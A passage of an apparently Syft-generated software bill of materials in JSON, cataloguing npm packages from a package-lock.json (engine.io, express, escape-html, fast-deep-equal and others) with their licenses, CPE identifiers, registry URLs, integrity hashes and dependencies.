","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:socket:engine.io:6.6.7:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/engine.io@6.6.7","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/engine.io/-/engine.io-6.6.7.tgz","integrity":"sha512-DgOngfDKM2EviOH3Mr9m7ks1q8roetLy/IMmYthAYzbpInMbYc/GS+fWFA3rl1gvwKVsQrVV61fo5emD1y3OJQ==","dependencies":{"@types/cors":"^2.8.12","@types/node":">=10.0.0","@types/ws":"^8.5.12","accepts":"~1.3.4","base64id":"2.0.0","cookie":"~0.7.2","cors":"~2.8.5","debug":"~4.4.1","engine.io-parser":"~5.2.1","ws":"~8.18.3"}}},{"id":"930ef4784cebfb4a","name":"engine.io-client","version":"6.6.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:socket:engine.io-client:6.6.4:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/engine.io-client@6.6.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/engine.io-client/-/engine.io-client-6.6.4.tgz","integrity":"sha512-+kjUJnZGwzewFDw951CDWcwj35vMNf2fcj7xQWOctq1F2i1jkDdVvdFG9kM/BEChymCH36KgjnW0NsL58JYRxw==","dependencies":{"@socket.io/component-emitter":"~3.1.0","debug":"~4.4.1","engine.io-parser":"~5.2.1","ws":"~8.18.3","xmlhttprequest-ssl":"~2.1.1"}}},{"id":"b307d9bc2f957b2d","name":"engine.io-parser","version":"5.2.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:engine.io-parser:engine.io-parser:5.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:engine.io-parser:engine.io_parser:5.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:engine.io_parser:engine.io-parser:5.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:engine.io_parser:engine.io_parser:5.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:engine.io:engine.io-parser:5.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:engine.io:engine.io_parser:5.2.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/engine.io-parser@5.2.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/engine.io-parser/-/engine.io-parser-5.2.3.tgz","integrity":"sha512-HqD3yTBfnBxIrbnM1DoD6Pcq8NECnh8d4As1Qgh0z5Gg3jRRIqijury0CL3ghu/edArpUYiYqQiDUQBIs4np3Q==","dependencies":null}},{"id":"3c365deec0186b44","name":"entities","version":"4.5.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-2-Clause","spdxExpression":"BSD-2-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:entities:entities:4.5.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/entities@4.5.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/entities/-/entities-4.5.0.tgz","integrity":"sha512-V0hjH4dGPh9Ao5p0MoRY6BVqtwCjhz6vI5LT8AJ55H+4g9/4vbHx1I54fS0XuclLhDHArPQCiMjDxjaL8fPxhw==","dependencies":null}},{"id":"198a07fe3b41a7bb","name":"es-define-property","version":"1.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:es-define-property:es-define-property:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es-define-property:es_define_property:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es_define_property:es-define-property:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es_define_property:es_define_property:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es-define:es-define-property:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es-define:es_define_property:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es_define:es-define-property:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es_define:es_define_property:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es:es-define-property:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es:es_define_property:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/es-define-property@1.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz","integrity":"sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==","dependencies":null}},{"id":"524e10cb2d7467ea","name":"es-errors","version":"1.3.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:es-errors:es-errors:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es-errors:es_errors:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es_errors:es-errors:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es_errors:es_errors:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es:es-errors:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es:es_errors:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/es-errors@1.3.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz","integrity":"sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==","dependencies":null}},{"id":"fa7ef7424a021d69","name":"es-object-atoms","version":"1.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:es-object-atoms:es-object-atoms:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es-object-atoms:es_object_atoms:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es_object_atoms:es-object-atoms:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es_object_atoms:es_object_atoms:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es-object:es-object-atoms:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es-object:es_object_atoms:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es_object:es-object-atoms:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es_object:es_object_atoms:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es:es-object-atoms:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es:es_object_atoms:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/es-object-atoms@1.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz","integrity":"sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==","dependencies":{"es-errors":"^1.3.0"}}},{"id":"8f498e19379b53ea","name":"es-set-tostringtag","version":"2.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:es-set-tostringtag:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es-set-tostringtag:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es_set_tostringtag:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es_set_tostringtag:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es-set:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es-set:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es_set:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es_set:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:es:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/es-set-tostringtag@2.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz","integrity":"sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==","dependencies":{"es-errors":"^1.3.0","get-intrinsic":"^1.2.6","has-tostringtag":"^1.0.2","hasown":"^2.0.2"}}},{"id":"2a58ccd5fc44a7b2","name":"escalade","version":"3.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:escalade:escalade:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/escalade@3.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz","integrity":"sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==","dependencies":null}},{"id":"94fc6050cdb348bc","name":"escape-html","version":"1.0.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:escape-html:escape-html:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:escape-html:escape_html:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:escape_html:escape-html:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:escape_html:escape_html:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:escape:escape-html:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:escape:escape_html:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/escape-html@1.0.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/escape-html/-/escape-html-1.0.3.tgz","integrity":"sha512-NiSupZ4OeuGwr68lGIeym/ksIZMJodUGOSCZ/FSnTxcrekbvqrgdUxlJOMpijaKZVjAJrWrGs/6Jy8OMuyj9ow==","dependencies":null}},{"id":"4ddb33d9fc7b6ece","name":"etag","version":"1.8.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:etag:etag:1.8.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/etag@1.8.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/etag/-/etag-1.8.1.tgz","integrity":"sha512-aIL5Fx7mawVa300al2BnEE4iNvo1qETxLrPI/o05L7z6go7fCw1J6EQmbK4FmJ2AS7kgVF/KEZWufBfdClMcPg==","dependencies":null}},{"id":"419bcd6d1f4e7103","name":"event-target-shim","version":"5.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:event-target-shim:event-target-shim:5.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:event-target-shim:event_target_shim:5.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:event_target_shim:event-target-shim:5.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:event_target_shim:event_target_shim:5.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:event-target:event-target-shim:5.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:event-target:event_target_shim:5.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:event_target:event-target-shim:5.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:event_target:event_target_shim:5.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:event:event-target-shim:5.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:event:event_target_shim:5.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/event-target-shim@5.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/event-target-shim/-/event-target-shim-5.0.1.tgz","integrity":"sha512-i/2XbnSz/uxRCU6+NdVJgKWDTM427+MqYbkQzD321DuCQJUqOuJKIA0IM2+W2xtYHdKOmZ4dR6fExsd4SXL+WQ==","dependencies":null}},{"id":"2bf11b6ac833063c","name":"eventemitter3","version":"4.0.7","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:eventemitter3:eventemitter3:4.0.7:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/eventemitter3@4.0.7","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/eventemitter3/-/eventemitter3-4.0.7.tgz","integrity":"sha512-8guHBZCwKnFhYdHr2ysuRWErTwhoN2X8XELRlrRwpmfeY2jjuUN4taQMsULKUVo1K4DvZl+0pgfyoysHxvmvEw==","dependencies":null}},{"id":"bca3d6fcf9ecc55d","name":"events","version":"3.3.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:events:events:3.3.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/events@3.3.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/events/-/events-3.3.0.tgz","integrity":"sha512-mQw+2fkQbALzQ7V0MY0IqdnXNOeTtP4r0lN9z7AAawCXgqea7bDii20AYrIBrFd/Hx0M2Ocz6S111CaFkUcb0Q==","dependencies":null}},{"id":"7bcabe4027921ced","name":"express","version":"4.22.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:openjsf:express:4.22.1:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/express@4.22.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/express/-/express-4.22.1.tgz","integrity":"sha512-F2X8g9P1X7uCPZMA3MVf9wcTqlyNp7IhH5qPCI0izhaOIYXaW9L535tGA3qmjRzpH+bZczqq7hVKxTR4NWnu+g==","dependencies":{"accepts":"~1.3.8","array-flatten":"1.1.1","body-parser":"~1.20.3","content-disposition":"~0.5.4","content-type":"~1.0.4","cookie":"~0.7.1","cookie-signature":"~1.0.6","debug":"2.6.9","depd":"2.0.0","encodeurl":"~2.0.0","escape-html":"~1.0.3","etag":"~1.8.1","finalhandler":"~1.3.1","fresh":"~0.5.2","http-errors":"~2.0.0","merge-descriptors":"1.0.3","methods":"~1.1.2","on-finished":"~2.4.1","parseurl":"~1.3.3","path-to-regexp":"~0.1.12","proxy-addr":"~2.0.7","qs":"~6.14.0","range-parser":"~1.2.1","safe-buffer":"5.2.1","send":"~0.19.0","serve-static":"~1.16.2","setprototypeof":"1.2.0","statuses":"~2.0.1","type-is":"~1.6.18","utils-merge":"1.0.1","vary":"~1.1.2"}}},{"id":"41f99f3613a4245b","name":"express-rate-limit","version":"8.5.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:express-rate-limit:express-rate-limit:8.5.1:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/express-rate-limit@8.5.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/express-rate-limit/-/express-rate-limit-8.5.1.tgz","integrity":"sha512-5O6KYmyJEpuPJV5hNTXKbAHWRqrzyu+OI3vUnSd2kXFubIVpG7ezpgxQy76Zo5GQZtrQBg86hF+CM/NX+cioiQ==","dependencies":{"ip-address":"^10.2.0"}}},{"id":"c7f94791a09e5a4e","name":"extend","version":"3.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:extend_project:extend:3.0.2:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/extend@3.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/extend/-/extend-3.0.2.tgz","integrity":"sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==","dependencies":null}},{"id":"2efb607597053214","name":"farmhash-modern","version":"1.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:farmhash-modern:farmhash-modern:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:farmhash-modern:farmhash_modern:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:farmhash_modern:farmhash-modern:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:farmhash_modern:farmhash_modern:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:farmhash:farmhash-modern:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:farmhash:farmhash_modern:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/farmhash-modern@1.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/farmhash-modern/-/farmhash-modern-1.1.0.tgz","integrity":"sha512-6ypT4XfgqJk/F3Yuv4SX26I3doUjt0GTG4a+JgWxXQpxXzTBq8fPUeGHfcYMMDPHJHm3yPOSjaeBwBGAHWXCdA==","dependencies":null}},{"id":"18c3431d6798a7cd","name":"fast-deep-equal","version":"2.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:fast-deep-equal:fast-deep-equal:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast-deep-equal:fast_deep_equal:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast_deep_equal:fast-deep-equal:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast_deep_equal:fast_deep_equal:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast-deep:fast-deep-equal:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast-deep:fast_deep_equal:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast_deep:fast-deep-equal:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast_deep:fast_deep_equal:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast:fast-deep-equal:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast:fast_deep_equal:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/fast-deep-equal@2.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-2.0.1.tgz","integrity":"sha512-bCK/2Z4zLidyB4ReuIsvALH6w31YfAQDmXMqMx6FyfHqvBxtjC0eRumeSu4Bs3XtXwpyIywtSTrVT99BxY1f9w==","dependencies":null}},{"id":"5dcd27213b9411fd","name":"fast-deep-equal","version":"3.1.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:fast-deep-equal:fast-deep-equal:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast-deep-equal:fast_deep_equal:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast_deep_equal:fast-deep-equal:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast_deep_equal:fast_deep_equal:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast-deep:fast-deep-equal:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast-deep:fast_deep_equal:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast_deep:fast-deep-equal:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast_deep:fast_deep_equal:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast:fast-deep-equal:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast:fast_deep_equal:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/fast-deep-equal@3.1.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz","integrity":"sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==","dependencies":null}},{"id":"fea7469744f21377","name":"fast-equals","version":"5.4.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:fast-equals:fast-equals:5.4.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast-equals:fast_equals:5.4.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast_equals:fast-equals:5.4.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast_equals:fast_equals:5.4.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast:fast-equals:5.4.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast:fast_equals:5.4.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/fast-equals@5.4.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs